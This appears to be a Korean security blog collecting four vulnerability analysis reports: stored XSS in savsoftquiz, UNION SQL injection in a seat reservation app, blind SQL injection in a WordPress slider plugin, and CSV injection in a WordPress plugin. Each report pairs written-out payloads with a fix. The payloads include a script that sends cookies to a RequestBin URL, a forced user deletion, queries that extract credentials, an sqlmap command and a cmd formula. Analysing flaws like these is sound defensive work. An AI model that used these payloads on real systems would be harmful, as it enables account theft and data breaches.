1. 개요

CVE 코드

CVE – 2020 -24609

분류

Stored XSS (Cross Site Scripting)

대상 어플리케이션

savsoftquiz_v5

취약 코드

application\config\config.php

실행 환경

Apache 2.0 / Windows 7 x64 / Codeigniter Web Framework

퀴즈를 제공하여 사용자에게 수익을 얻는 플랫폼이다.

Codeigniter Web Framework를 기반으로 만들어졌다. Codeigniter에서 제공하는 XSS필터링 기능을 사용하지 않아 XSS 문제가 발생하였다.

공격자는 악성스크립트를 삽입하여 쿠키, 세션 탈취, DBD 공격을 유도할 수 있다.

(그림 1) 메인 페이지 화면
(그림 2) XSS가 발생한 페이지  

 

XSS (Cross Site Scripting)

XSS공격이란 권한 없는 사용자가 웹사이트에 스크립트를 삽입하는 공격 기법이다.

공격에 성공하게 되면 사용자들은 악성스크립트가 삽입된 페이지에 접근했을 때 스크립트가 실행되어 쿠키나 세션 탈취, 악성 홈페이지 접속, DBD 유도 등의 피해를 입을 수 있다.

자주 쓰이는 공격 방법은 StoredReflected가 있다.

 

Stored XSS

웹사이트 게시판이나 특정 페이지에 스크립트를 삽입하는 공격 방식이다.

악성스크립트가 삽입된 페이지를 로드하면 스크립트가 실행된다.

Stored XSS

Reflected XSS

공격자는 XSS 동작하는 URL 악성스크립트를 삽입하고 노출시킨다.

사용자가 해당 URL 서버에 전송하면 서버는 정확한 결과가 없어 결과를 처리하지 못하고 악성스크립트를 응답페이지에 포함하여 사용자에게 돌려준다.

 

Reflected XSS


2.   상세분석

2.1. 발생 원리

Codeigniter Web Framework는 자체 XSS필터 기능을 제공한다.

Global_xss_filtering값이 FALSE로 설정되어 있어 XSS가 발생 하였다.

( 그림 5) global_xss_filtering이 FALSE로 되어있다.

 

 

Name 악성스크립트 삽입 admin 대쉬보드 페이지에 악성 스크립트가 등록된다.

(그림6) 악성 스크립트가 삽입되는 위치

 

2.2 취약점 확인

Stored XSS 취약점을 이용하여 admin의 세션 쿠키을 탈취할 것이다.

쿠키 값을 받아오기 위해 RequestBin사이트를 이용했다.

ReuestBin은 온라인 기방의 웹 훅 요청 데이터 확인 도구이다.

간단하게 URL를 생성하고 해당 URL을 이용하여 데이터를 가져올 수 있다.

ReuestBin 이용하여 생성한 URL에 쿠기 데이터를 전송하여 쿠키를 탈취해 온다.

( 그림7)    클릭 하나 만으로 쉽게 웹 훅 환경을 만들 수 있다.

 

가입창에 악성 스크립트를 삽입한다.

스크립트 :

<script>window.location.href="RequestBin URL/?cookie="+document.cookie</script>

(그림8) Contact칸에 악성 스크립트를 삽입  

 

admin으로 대쉬보드에 로그인 한다.

스크립트가 실행됐으나 Cookie옵션이 HttpOnly 때문에 쿠기 탈취가 불가능했다.

 

( 그림10) Httponly 옵션으로 인해 아무런 값이 들어가지 않는다.

 

 

XSS를 이용하여 CSRF 공격을 시도하였다.

공격자는 6번을 삭제를 목표로 CSRF 공격을 시도한다.

Admin은 의도치 않게 6번을 삭제하는 URL를 실행시킨다.

스크립트 :

<script>window.location.href="http://192.168.0.132/savsoftquiz/index.php/user/remove_user/6"</script>

( 그림11) 정상적으로 실행되면 subadmin이 삭제된다.

 

( 그림12) CSRF 공격시도

 

 

성공적으로 스크립트가 실행되었다.

( 그림14) subadmin 계정이 삭제 되었다.


3.대응 방안

config.phpglobal_xss_filtering TRUE로 바꾼다.

 

 

적용

(그림16) 필터링되어 XSS가 발생하지 않는다.  


4. 참고자료

 

-  Savsoft Quiz 5

https://github.com/savsofts/savsoftquiz_v5.git  

-  Exploit-DB

https://www.exploit-db.com/exploits/48753  

-  CodeIgniter

https://www.codeigniter.com/userguide3/index.html

 


CVE-2020-24609_보고서.pdf
0.76MB

1. 개요

CVE 코드

EDB – ID - 48822

분류

SQL Union Injection

대상 어플리케이션

Seat Reservation System 1.0 버전에서 발생

취약 코드

/seat_reservation/reserve.php

영화 좌석 예약을 하는 웹페이지 서비스이다.

예약을 하는 페이지에서 id값을 받을 입력 값을 검증하지 않아 발생하였다.

(그림1) 메인 페이지 화면

 

(그림 2) Union Sql Injection이 발생한 페이지

Union Sql Injection

UNIION 명령어는 조회한 sql 결과를 합치고 싶을 사용하는 명령어이다.

도시와 나라를 조회하는 쿼리문이 있다.

(그림 3) https://www.w3schools.com/sql/ 이용하였다.

 

 

UNION 사용하면 내가 원하는 sql결과와 합칠 있다.

UNION 이용해 1,2 합쳐서 조회하였다.

(그림 4) 1,2가 같이 조회되었다.

 

UNION Sql Injection 입력 값을 검증하는 않는 코드에 UNION 주입하여 공격자 원하는 정보를 출력한다.

 

1. 상세분석

1.1. 발생 원리

$id 값을 넣을 아무런 검증을 거치지 않고 SQL Query 입력 값을 받는다.

(그림5) id값을 그대로 넣어준다.

 

UNION명령어로 인해 공격자가 원하는 정보로 뒤바뀌어 출력된다.

(그림6) Union sql Injection으로 대체되는 부분

 

2.2 취약점 확인

존재하지 않는 id값을 넣어 전송해 보았다.

입력URL : URL/seat_reservation/index.php?page=reserve&id=12124

Sql에서 존재하지 값이 존재하지 않아 빈페이지를 불러온다.

 

UNION SQL Injection 구문을 넣었다.

입력 URL : URL/seat_reservation/index.php?page=reserve&id=’’ union select 1; --

컬럼 개수가 맞지 않아 오류가 발생했다.

 

 

여러 시도 결과 컬럼 개수가 8개인 것을 확인할 있었다.

입력 URL : URL/seat_reservation/index.php?page=reserve&id=’’ union select 1,2,3,4,5,6,7,8;--

 

메타데이터를 가져오는 sql 명령문을 이용해 테이블 명을 가져왔다.

입력 URL : URL/seat_reservation/index.php?page=reserve&id=''union select 1,group_concat(table_name),3,4,5,6,7,8 FROM information_schema.tables WHERE table_schema=database(); --

 

계정 정보는 users 들어 있음을 이름을 통해 추측할 있다. users 컬럼을 추출하였다.

입력 URL : URL/seat_reservation/index.php?page=reserve&id=''union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name='users';

 

관리자의 아이디와 패스워드를 추출하였다.

입력 URL : URL/seat_reservation/index.php?page=reserve&id=''union select 1,group_concat(username),3,group_concat(password),5,6,7,8 from users;--  

 

3.대응 방안

소스코드에SQL 필터링을 적용한다.

적용

적용

 Union Sql Injection 발생하지 않는다.

4. 참고자료

-  Seat Reservation System 1.0

https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip

-  Exploit-DB

https://www.exploit-db.com/exploits/48822

-  w3cshools

https://www.w3schools.com/sql/

 

EDB-ID-48822 분석 보고서.pdf
0.54MB

'취약점 분석 > EDB' 카테고리의 다른 글

[EDB] EDB-ID-48197 취약점 분석 - CVS Injection  (0) 2020.09.20

1. 개요

CVE 코드

CVE – 2020 -11530

분류

SQL 블라인드 인젝션

대상 어플리케이션

Wordpress ChopSlider3 3.4이하 버전에서 발생

취약 코드

/chopslider/get_script/index.php

index.php에서 id를 받아오는 과정에서 입력 값을 검증하지 않아 발생한 취약점 이다.

 

2. 상세 분석

 

2.1. 발생 원리

 

$id에 값을 넣을 때 아무런 검증을 거치지 않고 SQL Query 입력 값을 받는다.

$id값에 아무런 검증을 거치지 않는다.

 

 

2.2 취약점 확인

 

웹 사이트에 접속하여 SQL Injection이 발생하는지 쿼리를 sleep()함수를 통해 확인하였다.

입력값 : ?id=1111111 or (SELECT sleep(5))=111

SQL 인젝션이 유효하다면 해당 구문으로 인해 5초의 딜레이가 생긴다.

5초의 딜레이가 생긴 후 쿼리문이 응답하는 것을 확인하였다.

시간 기반 BLIND SQL 인젝션 공격이 가능 하다.

 

Kali 리눅스의 Sqlmap을 사용하여 진단해 보았다.

sqlmap -u URL?id=1111 --level=5 risk=3

 

Blind Sql Injection자동화 기능으로 테이블을 추출 하였다.

 

DB의 개인정보까지 추출가능하다.

 

3.대응 방안

소스코드에SQL 필터링을 적용한다.

 

적용

 

적용 후

 

 

4. 참고자료

-  Chop Slider3플러그인

https://github.com/idangerous/Plugins/tree/master/Chop%20Slider%203

 

-  Exploit-DB

https://www.exploit-db.com/exploits/48457

 

EDB-ID-48822 분석 보고서.pdf
0.54MB

취약점 개요

WordPress 플러그인 Wordpress Plugin Search Meter 2.13.2이하 버전에서 발견된 취약점이다. 워드프레스 검색정보를 통계해주는 플러그인이다. 엑셀로 내보내는 기능에서 입력 값을 검증하지 않아 CSV Injection 공격이 가능하다. 엑셀 함수를 이용하여 악성 파일을 실행시키거나 악성 사이트에 접속시킬 수 있다.

 

상세 분석

1)발생원리

 

 해당 취약점은 CSV파일을 생성할 때 Injection을 발생 시킬 수 있는 =,@,+,- 문자들을 검증하지 않아 발생한다.

 

$results_arrty[] 에 값을 넣을 때 아무런 검증을 하지 않는다.

2) 취약점 확인

 

 워드프레스 검색창에 원하고자 하는 명령어를 입력한다.

  =cmd|' /C notepad'!'A1'

 

원격데이터가 자동으로 실행되고 경고창이 뜬다 
CMD 을 통하여 notepad가 실행

 

 

대응방안

 csv파일을 내보낼 때 취약한 문자에 대해 검증이 이루어지지 않아서 발생하는 취약점이다. =,@,+,- 문자들을 검증하는 함수를 만든다.

 

 

함수 적용

 

 용결과 :

공백이 추가되어 실행되지 않는다.

 

 

참고자료 

* search meter 플러그인

https://wordpress.org/plugins/search-meter/

* CSV-Injection

https://www.we45.com/blog/2017/02/14/csv-injection-theres-devil-in-the-detail/

* Exploit-DB

https://www.exploit-db.com/exploits/48197 

* Wordpress Plugin 취약점 분석

https://jinddeok.tistory.com/25

 

EDB-ID-48197 분석 보고서.pdf
0.22MB

'취약점 분석 > EDB' 카테고리의 다른 글

[EDB] EDB-ID-48822 취약점 분석 - Union Sql Injection  (0) 2020.10.04

+ Recent posts